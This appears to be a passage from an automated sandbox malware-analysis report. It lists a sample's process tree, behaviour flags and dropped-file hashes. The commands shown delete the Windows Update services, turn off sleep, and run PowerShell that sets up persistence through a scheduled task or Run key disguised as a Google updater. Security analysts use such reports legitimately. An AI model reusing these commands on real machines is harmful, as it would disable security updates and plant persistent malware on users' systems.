C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3504 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:2356
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:100
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:5116
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2952
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:3804
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:1456
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4508
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3308
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:5056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#swohxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5112 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe poozkvnrxvfy2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:3912 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:3676 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:3052
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:3648 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe dmggulfmfarpdeja 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUg8ay2y+VYraHZcqf3VP4jvXe0KHYGIm7PU1iPJbDPfXgxu6yix51VJK7EOURzybhdpQ5ADs0T0bihvedePfut5X3yG5N6+/PVJznc/LsMbJ4ZJE748XmPxsXasOKvqg0CeROSykVaZ1ZHN4DDCjwGevEuW83EOTRdMH74rBCwtiVTnDVHkghKqSxOKHaFO0tMpy2WxhyEGuNwpjeVr2GO6M8c0O4frTkgilv0tmAG+LA+Qv6u2M5nIC9r2VBUzVdKv2BHkvzY0iVE328mE6caCfp8l6KMjXHEWznbOK6UtD9AmSnrZAjFUjTj2DZ8j/cc45RWAhrh13cPAt2eO6rrnHzBGuu9Fj4sgH+bWjyJSyPdfxvkaU3aNP9hX3DUMGeiAI5XQR5s9U1nW1/Gl67YHd7aOscEFoJ1lLHrWCiK96MjvTHXjjs50dVt3dH5wmWuqmRPgX22q2Lg5Ln0qncNQm1Tw4xitt012QiwsFONis6ynTFoOWlhFEDWfCgyhU0HI0v5fMB8m1bGXHXRl2uQw==2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:508
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
PID:3468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 6003⤵
- Program crash
PID:1132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3468 -ip 34681⤵PID:4292
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1420
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.1MB
MD5a67b370209cb59556bea1a749dc100c0
SHA199ca547fb169db78462f7d9cde004bb085143238
SHA25644279387b530fe8202c1758bd72449c5660e1302132b248e53694869099a8f13
SHA512c783bd7c24124a6b829832c4159d6e912b048bd43789c5f22be70594c8933c3a0a32d9f604fe8cff21554c363d8f9b88fcb30e57b5d98c6a3191768da8857ade
-
Filesize
2.1MB
MD5a67b370209cb59556bea1a749dc100c0
SHA199ca547fb169db78462f7d9cde004bb085143238
SHA25644279387b530fe8202c1758bd72449c5660e1302132b248e53694869099a8f13
SHA512c783bd7c24124a6b829832c4159d6e912b048bd43789c5f22be70594c8933c3a0a32d9f604fe8cff21554c363d8f9b88fcb30e57b5d98c6a3191768da8857ade
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5731e9e4becec0b1ef9caad4b3562d4b4
SHA16dffb77aba4e92ad5bd4b7c02fdee6f328bcd457
SHA25671c7eca538938fa4d5b470fee41cfe43734e9beb9ae409d5b41111fa1a15c2d5
SHA512841cf559ae5b0feec4be43018717641399b3602a553112e98b07d498f1a44169924466abc7e2313b8e8cf1c0fdc1bb7635e2818aab8269b0ef349a0ba0cd6ae5
-
Filesize
1KB
MD5cae360fbbf96ccf9cc0ba51f2567827d
SHA1c7e274b2bc07d3a2e00aa9e6ad4d5439485e8688
SHA25660680c540a47d4ad28cb719aae461d4f5d46490cdf0507390c2d378bda1cc9a5
SHA5126b54d7f4071390680ef96088b09f052777342327bd847199584473248404e35bc0502abafbd3e6279d6a89415a428e6bd68206aa4b23efa615b484c171e15ff1
-
Filesize
160KB
MD53bfa3b9a42dbe7c9b44f68148af3da08
SHA181eaf79a846b5167d1afc098c0f7786d6f112e3f
SHA256c5a9654f05252237b734ba17f5506556716964c26ae770bb00768e7d6732fed4
SHA512691f86f11494d0e4d6d9ae2d66ad3c6a0f55fb91974bfce143900e61ae54d2956c0d0627ffa5234d59c17bf575196dccbf69179f03829d525c0da114ec9b1cfc
-
Filesize
160KB
MD53bfa3b9a42dbe7c9b44f68148af3da08
SHA181eaf79a846b5167d1afc098c0f7786d6f112e3f
SHA256c5a9654f05252237b734ba17f5506556716964c26ae770bb00768e7d6732fed4
SHA512691f86f11494d0e4d6d9ae2d66ad3c6a0f55fb91974bfce143900e61ae54d2956c0d0627ffa5234d59c17bf575196dccbf69179f03829d525c0da114ec9b1cfc
-
Filesize
160KB
MD53bfa3b9a42dbe7c9b44f68148af3da08
SHA181eaf79a846b5167d1afc098c0f7786d6f112e3f
SHA256c5a9654f05252237b734ba17f5506556716964c26ae770bb00768e7d6732fed4
SHA512691f86f11494d0e4d6d9ae2d66ad3c6a0f55fb91974bfce143900e61ae54d2956c0d0627ffa5234d59c17bf575196dccbf69179f03829d525c0da114ec9b1cfc
-
Filesize
2.1MB
MD5a67b370209cb59556bea1a749dc100c0
SHA199ca547fb169db78462f7d9cde004bb085143238
SHA25644279387b530fe8202c1758bd72449c5660e1302132b248e53694869099a8f13
SHA512c783bd7c24124a6b829832c4159d6e912b048bd43789c5f22be70594c8933c3a0a32d9f604fe8cff21554c363d8f9b88fcb30e57b5d98c6a3191768da8857ade
-
Filesize
2.1MB
MD5a67b370209cb59556bea1a749dc100c0
SHA199ca547fb169db78462f7d9cde004bb085143238
SHA25644279387b530fe8202c1758bd72449c5660e1302132b248e53694869099a8f13
SHA512c783bd7c24124a6b829832c4159d6e912b048bd43789c5f22be70594c8933c3a0a32d9f604fe8cff21554c363d8f9b88fcb30e57b5d98c6a3191768da8857ade
-
Filesize
3.5MB
MD55aea760311ee1097be9b77c7521bd66c
SHA19edcdf319cfad114ac7aae6426bbcc1ec95ad772
SHA256b97dff82120df109b3687048662a1840e15fa3c578244afdb210c2903a1d3c80
SHA5121fc7dcb21854860baa8a985673febf7218ab72c42855d08155ec09ae6eb0eb5c0a4fb044130feacb4c9fa1ab80949089d7d8f6476d350608dc42e359792f66dc
-
Filesize
3.5MB
MD55aea760311ee1097be9b77c7521bd66c
SHA19edcdf319cfad114ac7aae6426bbcc1ec95ad772
SHA256b97dff82120df109b3687048662a1840e15fa3c578244afdb210c2903a1d3c80
SHA5121fc7dcb21854860baa8a985673febf7218ab72c42855d08155ec09ae6eb0eb5c0a4fb044130feacb4c9fa1ab80949089d7d8f6476d350608dc42e359792f66dc
-
Filesize
557KB
MD566803a11ccb01230eef44d1c7b6142dd
SHA15ca0c626d85320781c8cafc5fa1df746ef270106
SHA2561bd7124ca0b3dee4d3f8bf532bbc6ddb6abbd09a49eb2bf229bc6c3131fb3429
SHA5128252e1eb3a9d2331b2c826065c916365a6b9ac074eaa56e5f7fe2afa9f8e7ea4afb57494eed59780dffca500fe48f8820bca3fa51763775f5685dca5b4fafcf1
-
Filesize
52KB
MD51b20e998d058e813dfc515867d31124f
SHA1c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f
SHA25624a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00
SHA51279849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6
-
Filesize
52KB
MD51b20e998d058e813dfc515867d31124f
SHA1c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f
SHA25624a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00
SHA51279849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6
-
Filesize
2KB
MD57b1d6a1e1228728a16b66c3714aa9a23
SHA18b59677a3560777593b1fa7d67465bbd7b3bc548
SHA2563f15965d0159a818849134b3fbb016e858ac50efdf67bfcd762606ac51831bc5
SHA512573b68c9865416ea2f9cf5c614fcedbfe69c67bd572bacec81c1756e711bd90fcfee93e17b74fb294756adf67ad18845a56c87f7f870940cbaeb3a579146a3b6
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5